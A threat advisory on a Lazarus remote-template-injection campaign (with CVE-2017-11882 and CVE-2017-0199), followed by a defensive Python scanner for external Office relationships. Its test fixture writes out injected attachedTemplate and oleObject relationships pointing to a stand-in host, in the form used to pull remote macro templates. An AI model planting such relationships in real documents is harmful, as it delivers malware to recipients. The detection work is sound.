High
A new active sample has been detected and linked to the North Korean Advanced Persistent Threat group known as Lazarus (also tracked as Hidden Cobra). The sample uses remote template injection: the document itself carries no macro, but it references an external template that Office fetches when the file is opened; the malicious macro in that template then drops a backdoor on the target system, giving the attacker remote control of the machine. It is likely delivered as an Office file that is detected as a Trojan dropper. Common attack methods of this group include exploiting zero-days, spearphishing, custom malware, disinformation, backdoors and droppers. The group is a financially motivated threat actor and has been linked to major breaches over the past decade. The attack may also exploit two vulnerabilities in Microsoft Office: CVE-2017-11882, a memory corruption vulnerability in the Equation Editor component, and CVE-2017-0199, a remote code execution vulnerability in the handling of OLE linked objects.
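The template-injection primitive described above is visible statically: an OOXML document is a ZIP package, and an attached remote template shows up as a Relationship with TargetMode="External" in word/_rels/settings.xml.rels, while the CVE-2017-0199 delivery pattern is an external oleObject relationship. The scanner below is an added example, not code from the advisory or from any vendor tool. It builds a minimal constructed .docx in memory (the URL 203.0.113.5 is a documentation address, not an indicator from this campaign), then flags external relationships of the types attackers abuse while ignoring ordinary hyperlinks.

```python
"""Scan an OOXML package (.docx/.dotm/.xlsx/.pptx) for external relationships
abused for remote template injection and OLE-link delivery.
Added example; not code from the original advisory."""
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OD_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Relationship types a benign document almost never points at a remote location.
# attachedTemplate is the template-injection primitive (Word fetches the template,
# macros included, on open); an external oleObject is the CVE-2017-0199 pattern.
HIGH_RISK_REL_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument"}
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")


def is_remote_target(target: str) -> bool:
    """True for URLs and UNC paths; a local drive path is not remote."""
    return target.lower().startswith(REMOTE_PREFIXES)


def find_external_relationships(doc_bytes: bytes) -> list:
    """Return one finding per external relationship worth a second look."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(part))
            except ET.ParseError:
                continue  # malformed rels part; Office would reject it too
            for rel in root.iter(f"{{{PKG_RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel_type in HIGH_RISK_REL_TYPES:
                    severity = "high"
                elif rel_type != "hyperlink" and is_remote_target(target):
                    severity = "medium"  # unusual type reaching out of the package
                else:
                    continue  # plain hyperlinks are expected in documents
                findings.append({"part": part, "id": rel.get("Id"),
                                 "rel_type": rel_type, "target": target,
                                 "severity": severity})
    return findings


# ---- constructed test input; not a real sample from the advisory ----
def _rels(body: str) -> str:
    return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{PKG_RELS_NS}">{body}</Relationships>')


def build_docx(settings_rel: str = "", document_rel: str = "") -> bytes:
    """Build a minimal .docx in memory; the optional strings are spliced into
    settings.xml.rels (where an attached template lives) and document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                   '<Default Extension="xml" ContentType="application/xml"/></Types>')
        z.writestr("_rels/.rels", _rels(
            f'<Relationship Id="rId1" Type="{OD_NS}/officeDocument" Target="word/document.xml"/>'))
        z.writestr("word/_rels/document.xml.rels", _rels(
            f'<Relationship Id="rId1" Type="{OD_NS}/settings" Target="settings.xml"/>'
            f'<Relationship Id="rId2" Type="{OD_NS}/hyperlink" '
            'Target="https://example.com/" TargetMode="External"/>' + document_rel))
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        z.writestr("word/_rels/settings.xml.rels", _rels(settings_rel))
    return buf.getvalue()


# Hypothetical injected relationships (203.0.113.5 is a documentation address).
REMOTE_TEMPLATE_REL = (f'<Relationship Id="rId1" Type="{OD_NS}/attachedTemplate" '
                       'Target="http://203.0.113.5/update.dotm" TargetMode="External"/>')
OLE_LINK_REL = (f'<Relationship Id="rId3" Type="{OD_NS}/oleObject" '
                'Target="http://203.0.113.5/link.rtf" TargetMode="External"/>')

if __name__ == "__main__":
    for f in find_external_relationships(build_docx(REMOTE_TEMPLATE_REL, OLE_LINK_REL)):
        print(f"[{f['severity']}] {f['part']} {f['rel_type']} -> {f['target']}")
```

Run it against a real suspect file with `find_external_relationships(open(path, "rb").read())`. Note that a clean document with an ordinary external hyperlink produces no findings, so the check can run on mail-gateway volumes without drowning in noise; anything flagged high should be detonated rather than opened.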
MD5
SHA-256
SHA1